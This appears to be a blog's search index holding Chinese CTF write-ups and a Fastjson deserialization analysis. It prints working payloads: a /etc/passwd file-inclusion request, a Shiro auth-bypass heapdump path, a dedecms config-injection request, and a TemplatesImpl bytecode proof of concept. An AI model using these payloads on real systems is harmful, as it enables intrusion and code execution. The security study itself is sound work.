-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathsearch.xml
353 lines (170 loc) · 593 KB
/
search.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>湖湘杯2021</title>
<link href="2021/11/15/%E6%B9%96%E6%B9%98%E6%9D%AF2021/"/>
<url>2021/11/15/%E6%B9%96%E6%B9%98%E6%9D%AF2021/</url>
<content type="html"><![CDATA[<h1 id="easywill"><a href="#easywill" class="headerlink" title="easywill"></a>easywill</h1><p>WillPHPCMS 2.1.5,在index路由调用了一个可控的渲染函数 assign。<br><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/%E6%B9%96%E6%B9%98%E6%9D%AF2021/0a28db0430ce1debad2e1b82658280d5.png" alt="0a28db0430ce1debad2e1b82658280d5.png"></p><p> WillPHP 是用Thinkphp改的,thinkphp某个版本的存在一个文件包含漏洞,关键位置就是通过assign去渲染的时候存在一个变量覆盖,同样的跟了下WillPHP 发现也存在这个问题。</p><p> <img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/%E6%B9%96%E6%B9%98%E6%9D%AF2021/e875eb81c032c1b727131d16ec1b9e7a.png" alt="e875eb81c032c1b727131d16ec1b9e7a.png"></p><p>?name=cfile&value=/etc/passwd</p><p>接着找了下缓存文件和session文件,发现缓存文件都不可控,也没用设置session的位置。<br>最后发现P牛的最近更新的一篇文章 Docker PHP裸文件本地包含综述 <a href="https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html">https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html</a></p><p>利用 pearcmd</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/%E6%B9%96%E6%B9%98%E6%9D%AF2021/f18500e54d119f833dd00a2129dc5d48.png" alt="f18500e54d119f833dd00a2129dc5d48.png"></p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/%E6%B9%96%E6%B9%98%E6%9D%AF2021/eb91fd44bef108e0b2db181e969449c3.png" alt="eb91fd44bef108e0b2db181e969449c3.png"><br><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/%E6%B9%96%E6%B9%98%E6%9D%AF2021/8ef3bf5ce2f40484dc998411228068ab.png" alt="8ef3bf5ce2f40484dc998411228068ab.png"></p><h1 id="Pentest-in-Autumn"><a href="#Pentest-in-Autumn" class="headerlink" title="Pentest in Autumn"></a>Pentest in Autumn</h1><p>题目给了附件 Pom.xml</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line"><?xml version="1.0" encoding="UTF-8"?></span><br><span class="line"><project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"</span><br><span class="line"> xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd"></span><br><span class="line"> <modelVersion>4.0.0</modelVersion></span><br><span class="line"> <parent></span><br><span class="line"> <groupId>org.springframework.boot</groupId></span><br><span class="line"> <artifactId>spring-boot-starter-parent</artifactId></span><br><span class="line"> <version>2.5.4</version></span><br><span class="line"> <relativePath/> <!-- lookup parent from repository --></span><br><span class="line"> </parent></span><br><span class="line"> <groupId>com.demo</groupId></span><br><span class="line"> <artifactId>demo</artifactId></span><br><span class="line"> <version>0.0.1-SNAPSHOT</version></span><br><span class="line"> <name>demo</name></span><br><span class="line"> <description>Demo project for Spring Boot</description></span><br><span class="line"> <properties></span><br><span class="line"> <java.version>1.8</java.version></span><br><span class="line"> </properties></span><br><span class="line"> <dependencies></span><br><span class="line"> <dependency></span><br><span class="line"> <groupId>org.springframework.boot</groupId></span><br><span class="line"> <artifactId>spring-boot-starter</artifactId></span><br><span class="line"> </dependency></span><br><span class="line"> <dependency></span><br><span class="line"> <groupId>org.springframework.boot</groupId></span><br><span class="line"> <artifactId>spring-boot-starter-actuator</artifactId></span><br><span class="line"> <version>2.2.2.RELEASE</version></span><br><span class="line"> </dependency></span><br><span class="line"> <dependency></span><br><span class="line"> <groupId>org.apache.shiro</groupId></span><br><span class="line"> <artifactId>shiro-core</artifactId></span><br><span class="line"> <version>1.5.0</version></span><br><span class="line"> </dependency></span><br><span class="line"> <dependency></span><br><span class="line"> <groupId>org.apache.shiro</groupId></span><br><span class="line"> <artifactId>shiro-spring</artifactId></span><br><span class="line"> <version>1.5.0</version></span><br><span class="line"> </dependency> <!-- shiro ehcache --></span><br><span class="line"></span><br><span class="line"> <dependency></span><br><span class="line"> <groupId>org.apache.shiro</groupId></span><br><span class="line"> <artifactId>shiro-ehcache</artifactId></span><br><span class="line"> <version>1.5.0</version></span><br><span class="line"></dependency></span><br><span class="line"> <dependency></span><br><span class="line"></span><br><span class="line"> <groupId>org.springframework.boot</groupId></span><br><span class="line"> <artifactId>spring-boot-starter-test</artifactId></span><br><span class="line"> <scope>test</scope></span><br><span class="line"> </dependency></span><br><span class="line"> <dependency></span><br><span class="line"> <groupId>org.springframework.boot</groupId></span><br><span class="line"> <artifactId>spring-boot-starter-web</artifactId></span><br><span class="line"> <version>2.5.4</version></span><br><span class="line"> <scope>compile</scope></span><br><span class="line"> </dependency></span><br><span class="line"> </dependencies></span><br><span class="line"></span><br><span class="line"> <build></span><br><span class="line"> <plugins></span><br><span class="line"> <plugin></span><br><span class="line"> <groupId>org.springframework.boot</groupId></span><br><span class="line"> <artifactId>spring-boot-maven-plugin</artifactId></span><br><span class="line"> </plugin></span><br><span class="line"> </plugins></span><br><span class="line"> </build></span><br><span class="line"></span><br><span class="line"></project></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>使用了 shiro1.5 和 actuator<br>访问 /actuator 接口发现有权限校检,跳转之后是502还是啥来着,ichunqiu的环境直接显示的容器已过期的界面-_-。<br>通过 shiro1.5 的权限绕过漏洞<br>/;/actuator/env<br>/;/actuator/heapdump<br>下载heapdump,使用VisualVM打开找到 shiro 的 key<br><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/%E6%B9%96%E6%B9%98%E6%9D%AF2021/b9d7061071dda481f9876f94875efb3f.png" alt="b9d7061071dda481f9876f94875efb3f.png"></p><p>import base64<br>import struct</p><p>print(base64.b64encode(struct.pack(‘<bbbbbbbbbbbbbbbb’, -126,-67,24,-71,-62,-122,61,-52,91,77,-110,115,-43,100,-88,103)))</p><p>#gr0YucKGPcxbTZJz1WSoZw==<br>然后直接用Shiro反序列化工具一把梭。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/%E6%B9%96%E6%B9%98%E6%9D%AF2021/8693a0dd6a939fd36d8a13d3b812b67e.png" alt="8693a0dd6a939fd36d8a13d3b812b67e.png"></p>]]></content>
<categories>
<category> CTF </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> 湖湘杯 </tag>
</tags>
</entry>
<entry>
<title>极客谷杯2021 EZDEDE</title>
<link href="2021/10/23/%E6%9E%81%E5%AE%A2%E8%B0%B7%E6%9D%AF2021%20EZDEDE/"/>
<url>2021/10/23/%E6%9E%81%E5%AE%A2%E8%B0%B7%E6%9D%AF2021%20EZDEDE/</url>
<content type="html"><![CDATA[<h1 id=""><a href="#" class="headerlink" title=""></a></h1><h1 id="EZDEDE"><a href="#EZDEDE" class="headerlink" title="EZDEDE"></a>EZDEDE</h1><p>打开是一个dedecms5.7sp2 的安装界面,安装完成后只有一个重新安装的按钮,所以问题应该是出现在安装的这部分。<br>在dedecms 5.7sp1 里有一个 DedeCMS 5.7 sp1远程文件包含漏洞(CVE-2015-4553)<br><a href="https://www.cnblogs.com/yuzly/p/11332644.html">https://www.cnblogs.com/yuzly/p/11332644.html</a><br>看了一下漏洞分析<br>在 install/index.php 这里有个变量覆盖。<br><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/%E6%9E%81%E5%AE%A2%E8%B0%B7%E6%9D%AF2021%20EZDEDE/8ab4e70b83649937b0f481098353ec15.png" alt="8ab4e70b83649937b0f481098353ec15.png"></p><p>接着在 step 11这里可以通过变量覆盖 <code>$updateHost</code> 和 <code>$install_demo_name</code>去获取远程文件并写入。<br>这里 <code>$updatehost</code> 是写在 <code>../data/admin/config_update.php</code>里的<br>这里因为fopen中的参数是w所以我们可以通过 <code>fwrite($fp,$sql_content))</code> 把 <code>../data/admin/config_update.php</code> 文件内容覆盖。<br>这样我们就可以设置 <code>$updatehost </code>为我们自己构造的地址,从而控制写入的内容。<br><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/%E6%9E%81%E5%AE%A2%E8%B0%B7%E6%9D%AF2021%20EZDEDE/b0cff7b3a1c745629c0824d220e37b17.png" alt="b0cff7b3a1c745629c0824d220e37b17.png"></p><p>但是在sp2 版本里这些变量全都变成了静态变量,变量覆盖倒是还存在。<br><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/%E6%9E%81%E5%AE%A2%E8%B0%B7%E6%9D%AF2021%20EZDEDE/2e2c5e3abf2703dbca6789593daf89e3.png" alt="2e2c5e3abf2703dbca6789593daf89e3.png"></p><p>审计了一会发现安装模块的地方有个覆盖文件的地方。<br><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/%E6%9E%81%E5%AE%A2%E8%B0%B7%E6%9D%AF2021%20EZDEDE/5ab98dd7f8b92799e33f2f7b40a4c03b.png" alt="5ab98dd7f8b92799e33f2f7b40a4c03b.png"></p><p>在设置数据库的地方可以通过恶意 mysql 服务端去读文件。读了一下 /readflag /flag /flag.txt /start.sh /flag.sh 发现都没有读到。读了源码发现题目把 step 11 这部分代码删了,其实不用删也行。</p><p>又找了下其他有写文件操作的地方,第一处和第二处这里是把数据库和一些基本配置写入到配置文件,参数都被 <code>'</code> 包裹,而在变量覆盖的地方会对参数用 addslashes 函数处理,所以不能闭合逃逸。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/%E6%9E%81%E5%AE%A2%E8%B0%B7%E6%9D%AF2021%20EZDEDE/0283c397c918f9b02582601e2de20cb0.png" alt="0283c397c918f9b02582601e2de20cb0.png"><br><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/%E6%9E%81%E5%AE%A2%E8%B0%B7%E6%9D%AF2021%20EZDEDE/211982ec28e8c2024096fa3ecb37d6b1.png" alt="211982ec28e8c2024096fa3ecb37d6b1.png"></p><p>这部分是用我们的参数是通过 <code>"</code> 包裹的,这里可以直接通过<code>"${phpinfo()}"</code>执行。<br><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/%E6%9E%81%E5%AE%A2%E8%B0%B7%E6%9D%AF2021%20EZDEDE/42c5f295abe1b091806d098e0a2fe40d.png" alt="42c5f295abe1b091806d098e0a2fe40d.png"></p><p>在第四步的地方构造两个参数<code>modules[0]=${phpinfo()}&moduleCacheFile=1.php</code><br><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/%E6%9E%81%E5%AE%A2%E8%B0%B7%E6%9D%AF2021%20EZDEDE/208a69b5d693a5e2b39b0e5659de577f.png" alt="208a69b5d693a5e2b39b0e5659de577f.png"><br>debug 看参数到这都是正常的</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/%E6%9E%81%E5%AE%A2%E8%B0%B7%E6%9D%AF2021%20EZDEDE/2b550ecec4f19b3eaf7ff2b62176b2f3.png" alt="2b550ecec4f19b3eaf7ff2b62176b2f3.png"><br>这里好像没有创建文件的权限,得找一个存在的文件<br>payload</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">modules[0]=${phpinfo()}&moduleCacheFile=../data/admin/config_update.php&step=4&dbtype=mysql&dbhost=localhost%3A8889&dbuser=root&dbpwd=root%40123&dbprefix=dede_&dbname=dedecmsv57utf8sp1112&dblang=utf8&adminuser=admin&adminpwd=admin&cookieencode=tuDGaS1FQgW7KL1r1l6C20s3GMGg&webname=%E6%88%91%E7%9A%84%E7%BD%91%E7%AB%99&adminmail=admin%40dedecms.com&baseurl=http%3A%2F%2Fhost-web&cmspath=</span><br></pre></td></tr></table></figure><p>写入成功。<br><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/%E6%9E%81%E5%AE%A2%E8%B0%B7%E6%9D%AF2021%20EZDEDE/ccfbdd30167f56f0258abd917c47f738.png" alt="ccfbdd30167f56f0258abd917c47f738.png"><br><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/%E6%9E%81%E5%AE%A2%E8%B0%B7%E6%9D%AF2021%20EZDEDE/2579bd7e1c4e417264e9c90bbea923ee.png" alt="2579bd7e1c4e417264e9c90bbea923ee.png"></p>]]></content>
<categories>
<category> CTF </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> 极客谷 </tag>
<tag> dedecms </tag>
</tags>
</entry>
<entry>
<title>Fastjson 反序列化历史漏洞分析</title>
<link href="2021/09/08/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/"/>
<url>2021/09/08/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/</url>
<content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>Fastjson 阿里开发的一个 Java 库,可用于将 Java 对象转换为其 JSON 格式、 JSON 字符串转换为等效的 Java 对象。Fastjson 1.2.24 版本的远程代码执行漏洞开始,因为官方的各种奇葩修补方式不断被爆出新的反序列化漏洞。Fastjson 以前一直没有关注过,但是最近发现这个在项目上出现的次数有些过于频繁了,所以学习总结一下 Fastjson 反序列化漏洞。本文仅作学习记录。</p><p><a href="https://github.com/alibaba/fastjson">https://github.com/alibaba/fastjson</a></p><h1 id="Fastjson-1-2-24"><a href="#Fastjson-1-2-24" class="headerlink" title="Fastjson 1.2.24"></a>Fastjson 1.2.24</h1><p>17年 Fastjson 1.2.24版本被爆出存在反序列化漏洞,这个洞算是整个 Fastjson 反序列化漏洞史的开端。</p><p>FastJson 序列化对象为字符串的方法主要就是<code> toJSONString</code> 方法,而反序列化还原对象的方法有三个:<code>parseObject(String text) </code>、<code>parse (String text)</code>、<code>parseObject(String text, Class\ clazz)</code></p><p>其中 <code>parseObject</code>返回 <code>JSONObject</code> 而 <code>parse</code> 返回的是实际类型的对象。当在没有对应类的定义的情况下,通常情况下都会使用 <code>JSON.parseObject</code> 来获取数据。</p><p>而在反序列化的过程里会自动去调用反序列化对象中的 getter、setter方法以及构造函数,这就是 Fastjson 反序列化漏洞产生的原因,具体的分析过程网上有很多就不详细写了,可以看这篇文章<a href="http://blog.topsec.com.cn/fastjson-1-2-24%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e6%bc%8f%e6%b4%9e%e6%b7%b1%e5%ba%a6%e5%88%86%e6%9e%90/">http://blog.topsec.com.cn/fastjson-1-2-24%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e6%bc%8f%e6%b4%9e%e6%b7%b1%e5%ba%a6%e5%88%86%e6%9e%90/</a></p><p>总结一下通过这三种方式去反序列化 json 字符串时 getter和setter的调用情况</p><p> <code>parseObject(String text) </code>、<code>parse (String text)</code>、<code>parseObject(String text, Class\ clazz)</code></p><ol><li><p>parseObject(String text, Class\ clazz)</p><p><strong>setter</strong></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">方法名长度大于4且以set开头</span><br><span class="line">非静态函数</span><br><span class="line">返回类型为void或当前类</span><br><span class="line">参数个数为1个</span><br><span class="line">方法为 public 属性</span><br></pre></td></tr></table></figure><p><strong>getter</strong></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">方法名需要长于4</span><br><span class="line">非静态方法</span><br><span class="line">以 get 字符串开头,且第四个字符需要是大写字母</span><br><span class="line">方法不能有参数</span><br><span class="line">返回值类型继承自Collection \|\| Map \|\| AtomicBoolean \|\| AtomicInteger \|\|AtomicLong</span><br><span class="line">getter 方法对应的属性只能有 getter 不能有setter方法</span><br><span class="line">方法为 public 属性</span><br></pre></td></tr></table></figure></li><li><p>parseObject(String text)</p><p><strong>setter</strong></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">方法名长度大于4且以set开头</span><br><span class="line">非静态函数</span><br><span class="line">返回类型为void或当前类</span><br><span class="line">参数个数为1个</span><br><span class="line">public 属性</span><br></pre></td></tr></table></figure><p><strong>getter</strong></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">方法名长度大于4且以get开头</span><br><span class="line">非静态函数</span><br><span class="line">方法不能有参数</span><br><span class="line">public 属性</span><br></pre></td></tr></table></figure></li><li><p>parse (String text)</p><p><strong>setter</strong></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">方法名长度大于4且以set开头</span><br><span class="line">非静态函数</span><br><span class="line">返回类型为void或当前类</span><br><span class="line">参数个数为1个</span><br><span class="line">public 属性</span><br></pre></td></tr></table></figure><p><strong>getter</strong></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">方法名需要长于4</span><br><span class="line">非静态方法</span><br><span class="line">以 get 字符串开头,且第四个字符需要是大写字母</span><br><span class="line">方法不能有参数</span><br><span class="line">返回值类型继承自Collection \|\| Map \|\| AtomicBoolean \|\| AtomicInteger \|\|AtomicLong</span><br><span class="line">getter 方法对应的属性只能有 getter 不能有setter方法</span><br><span class="line">方法为 public 属性</span><br></pre></td></tr></table></figure></li></ol><p>所以只要找到某个类的 setter 方法和 getter 方法或者是构造函数中存在恶意调用的代码,就算是一条成功的利用链。</p><h2 id="TemplatesImpl"><a href="#TemplatesImpl" class="headerlink" title="TemplatesImpl"></a>TemplatesImpl</h2><p>研究过 TemplatesImpl 链的都知道,TemplatesImpl 链的入口有两个一个是 TemplatesImpl#newTransformer()</p><p>还有 TemplatesImpl#getOutputProperties(),其中 TemplatesImpl#getOutputProperties() 刚好就是一个getter 方法。</p><p>构造 TemplatesImpl 链</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210908183423893.png" alt="image-20210908183423893"></p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> com.alibaba.fastjson.JSON;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xerces.internal.impl.dv.util.Base64;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> javax.xml.transform.TransformerConfigurationException;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Field;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">FastjsonTest1</span> </span>{</span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> IllegalAccessException, TransformerConfigurationException, NoSuchFieldException </span>{</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> TemplatesImpl obj = <span class="keyword">new</span> TemplatesImpl();</span><br><span class="line"></span><br><span class="line"> Field field = <span class="keyword">null</span>;</span><br><span class="line"> Class<?> clazz = obj.getClass();</span><br><span class="line"> field = clazz.getDeclaredField(<span class="string">"_name"</span>);</span><br><span class="line"> field.setAccessible(<span class="keyword">true</span>);</span><br><span class="line"> field.set(obj, <span class="string">"HelloTemplatesImpl"</span>);</span><br><span class="line"></span><br><span class="line"> field = clazz.getDeclaredField(<span class="string">"_tfactory"</span>);</span><br><span class="line"> field.setAccessible(<span class="keyword">true</span>);</span><br><span class="line"> field.set(obj,<span class="keyword">new</span> TransformerFactoryImpl());</span><br><span class="line"> <span class="keyword">byte</span>[] code = Base64.decode</span><br><span class="line"> (<span class="string">"yv66vgAAADMAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgcAGwEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAcDAAdAB4BAD0vU3lzdGVtL0FwcGxpY2F0aW9ucy9DYWxjdWxhdG9yLmFwcC9Db250ZW50cy9NYWNPUy9DYWxjdWxhdG9yDAAfACABABxieXRlY29kZXMvSGVsbG9UZW1wbGF0ZXNJbXBsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvaW8vSU9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAANAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAAEAALAAAABAABAAwAAQAOAA8AAgAJAAAALgACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAABAAoAAAAOAAMAAAATAAQAFAANABUACwAAAAQAAQAQAAEAEQAAAAIAEg=="</span>);</span><br><span class="line"></span><br><span class="line"> field = clazz.getDeclaredField(<span class="string">"_bytecodes"</span>);</span><br><span class="line"> field.setAccessible(<span class="keyword">true</span>);</span><br><span class="line"> field.set(obj,<span class="keyword">new</span> <span class="keyword">byte</span>[][] {code});</span><br><span class="line"></span><br><span class="line"> obj.getOutputProperties();</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>把他转换成 fastjson 格式,可以看到构造的时候 TemplatesImpl 对象关键的三个属性<code> _bytecodes</code>、<code>_name</code>、<code>_tfactory</code></p><p>_bytecodes 为加载的字节码,私有属性但是有setter 方法,所以直接指定赋值就行。</p><p>_name 同样也是私有属性,也存在 setter 方法。</p><p>至于这个属性的作用,在 getTransletInstance() 函数里会检测<code>_name</code>是否为空,为空的话直接 return null ,所以我们得给<code>_name</code>随便赋个值。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210909101621807.png" alt="image-20210909101621807"></p><p><code>_tfactory</code> 属性是私有属性而且无 setter 方法,<code>_tfactory</code>类型为 TransformerFactoryImpl 类对象,有很多地方会调用 _tfactory 的某些方法,所以为空的话会导致报错退出。因为是私有属性而且无 setter 方法所以我们没办法直接给其赋值。</p><p>这里有个小技巧,fastjson 在反序列化时会判断其是否存在无参构造函数,如果存在的话会直接去调用 setter 方法给属性赋值,而没有 setter 方法的属性如果开启了<code>Feature.SupportNonPublicField</code>的话也会通过反射去给属性赋值。</p><p>判断 <code>Feature.SupportNonPublicField </code>是否开启</p><p>com/alibaba/fastjson/parser/deserializer/JavaBeanDeserializer.class</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/Fastjson%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210910152718302.png" alt="image-20210910152718302"></p><p>这部分代码在 com.alibaba.fastjson.util.FieldInfo</p><p><img src="" 